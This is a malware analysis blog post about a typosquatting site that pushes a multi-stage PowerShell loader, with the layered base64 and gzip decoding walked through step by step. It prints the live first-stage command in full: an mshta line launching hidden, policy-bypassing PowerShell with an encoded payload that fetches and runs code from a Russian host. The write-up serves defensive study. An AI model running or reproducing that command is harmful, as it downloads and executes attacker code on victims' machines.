TypoSquatting Malware Analysis

Published in

InfoSec Write-ups

5 min readSep 19, 2022

Have you ever fat-fingered an address in the URL bar? If yes, keep reading because some hackers are hoping you do exactly that…

According to Wikipedia, “Typosquatting, also called URL hijacking, a sting site, or a fake URL, is a form of cybersquatting, and possibly brandjacking which relies on mistakes such as typos made by Internet users when inputting a website address into a web browser. Should a user accidentally enter an incorrect website address, they may be led to any URL (including an alternative website owned by a cybersquatter).”

Some cyber criminals purchase domains similar to the ones you visit every day, hoping that during one of those evenings you are trying to watch funny cat videos on youtube.com, you accidentally type youtubr.com (example).

In this write up I will go over one of such cases I recently came across and I will analyze the malware that the malicious domain would download, with some (but not a whole lot) technical detail.

In our example, if you had misspelled just one letter in the URL you would be redirected to the following page (I am not providing the actual domain for confidentiality reasons).

As we can see from any.run analysis, there is quite a lot going on once you navigate to this suspicious website

The first command executed is

mshta vbscript:createobject(“wscript.shell”).run(“PowerShell -nop -exec bypass -Enc DQAKAGYAbwByACgAJABpAD0AMQA7ACQAaQAgAC0AbABlACAAMQAwADAAOwAkAGkAKwArACkADQAKAHsADQAKACQAYQA9ACcAaAB0AHQAcAA6AC8ALwBrADAAawB6AC4AcgB1AC8AaQAuAHAAaABwAD8AaQA9ADEAJwA7AGkAZQB4ACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACQAYQApADsATQBzAGkATQBhAGsAZQAoACIAJABhACIAKwAnADUAJwApADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMwAwAA0ACgB9AA0ACgA=”,0)(window.close)

mshta.exe is a Windows-native binary designed to execute Microsoft HTML Application (HTA) files. As its full name implies, Mshta can execute Windows Script Host code (VBScript and JScript) embedded within HTML in a network proxy-aware fashion.

As we can see there is a base64 encoded payload run with PowerShell. Let’s see what it does.

Looks like our base64 encoded PowerShell is trying to reach out to some “http://kokz[.]ru/” to download and run the string with IEX. The IEX (Invoke-Expression) cmdlet evaluates or runs a specified string as a command and returns the results of the expression or command.

Interesting… let’s see what it is trying to download.

woah! that’s a lot of base64. let's try to decode it and understand what it is doing.

After base64 decoding the previous image we get this. Looks like another base64 encoded string, however now we also see that the script is trying to decompress Gzip compression.

Let’s base64 decode the string one more time and let's save it into a file. As we can see the file command tells us that we have GZip compressed data just as we guessed.

After extracting the gzip compressed file we get another PowerShell script.

The following piece of code looks particularly interesting.

Here we have another base64 encoded payload, that is first base64 decoded and later there is done some byte arithmetic inside a for loop. Let’s see what is it exactly and as any cautious person would do, run the lines in PowerShell interpreter on our machine (NSFW).

We let the PowerShell do the arithmetic, that way we have less code to write. What we end up with, is a variable “$var_code” with around 800 lines of different numbers.